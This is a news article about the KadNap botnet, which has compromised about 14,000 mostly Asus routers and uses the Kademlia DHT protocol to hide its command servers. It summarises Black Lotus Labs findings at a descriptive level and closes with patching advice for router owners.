A sophisticated botnet comprised of approximately 14,000 routers and other network devices – primarily manufactured by Asus – is being exploited to anonymously proxy malicious traffic for cybercrime. The malware, dubbed KadNap, leverages vulnerabilities in unpatched systems to conscript these devices into a resilient, peer-to-peer network that’s proving tricky to dismantle.
Researchers at Lumen’s Black Lotus Labs first detected the botnet in August 2025, and it has since grown to an average of 14,000 infected routers daily, according to their latest findings. The United States is the primary location for compromised devices, accounting for roughly 60% of the network, with significant concentrations also found in Taiwan, Hong Kong, and Russia.
What sets KadNap apart is its innovative use of the Kademlia Distributed Hash Table (DHT) protocol. This technology, traditionally used in peer-to-peer networks like BitTorrent and the Inter-Planetary File System, obscures the IP addresses of the botnet’s command-and-control (C2) servers, making them significantly harder to locate and disrupt. “The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control,” researchers Steve Rudd and Chris Formosa wrote on Wednesday. “Their intention is clear: avoid detection and make it difficult for defenders to protect against.”
How KadNap Works
The infection process begins with the download of a malicious script (aic.sh) from a specific IP address, 212.104.141[.]140, which then establishes persistence through a cron job that runs every 55 minutes. This cron job repeatedly retrieves and executes the malicious code, ensuring the compromise survives reboots and configuration changes. Once active, the malware, an ELF binary named ‘kad,’ determines the host’s external IP address and connects to Network Time Protocol (NTP) servers to obtain the current time and system uptime.
Unlike traditional botnets that rely on centralized servers, KadNap utilizes the DHT protocol to locate other infected nodes and the C2 infrastructure. This decentralized structure means that each node manages only a subset of the complete network data, making it far more resilient to takedown attempts or denial-of-service attacks. According to Black Lotus Labs, nearly half of the KadNap network is connected to C2 infrastructure specifically dedicated to Asus-based bots.
Asus Routers: A Prime Target
The prevalence of Asus routers within the KadNap botnet is likely due to the availability of a reliable exploit targeting vulnerabilities in those models, according to Lumen researchers. While it’s unlikely the attackers are exploiting previously unknown “zero-day” vulnerabilities, the concentration suggests a successful exploitation of known, unpatched flaws. BleepingComputer reports that the botnet has been growing steadily since its initial discovery.
The use of KadNap highlights a growing trend in cybersecurity: the adoption of sophisticated, decentralized architectures by malicious actors to evade detection and maintain control. The Kademlia protocol, while legitimate in its original applications, provides a powerful tool for concealing malicious infrastructure within the noise of legitimate network traffic.
What Does This Mean for Users?
The KadNap botnet poses a significant threat to internet security, as the compromised routers are used to proxy malicious traffic, potentially masking the origin of cyberattacks and enabling various criminal activities. While the full extent of the botnet’s activities remains under investigation, the researchers emphasize the importance of keeping network devices updated with the latest security patches.
As the KadNap botnet continues to evolve, security professionals will need to develop new strategies to detect and disrupt its operations. The decentralized nature of the network presents a significant challenge, requiring a shift in focus from traditional centralized takedown methods to more sophisticated techniques for identifying and mitigating the impact of compromised devices. The ongoing monitoring of the network, currently exceeding 14,000 infected devices, will be crucial in understanding its capabilities and developing effective countermeasures.
What comes next will likely involve a continued arms race between security researchers and the operators of KadNap, as both sides seek to adapt and overcome the other’s defenses. Users are encouraged to regularly check for firmware updates for their routers and to practice good cybersecurity hygiene to minimize their risk of infection. Please share your thoughts and experiences in the comments below.
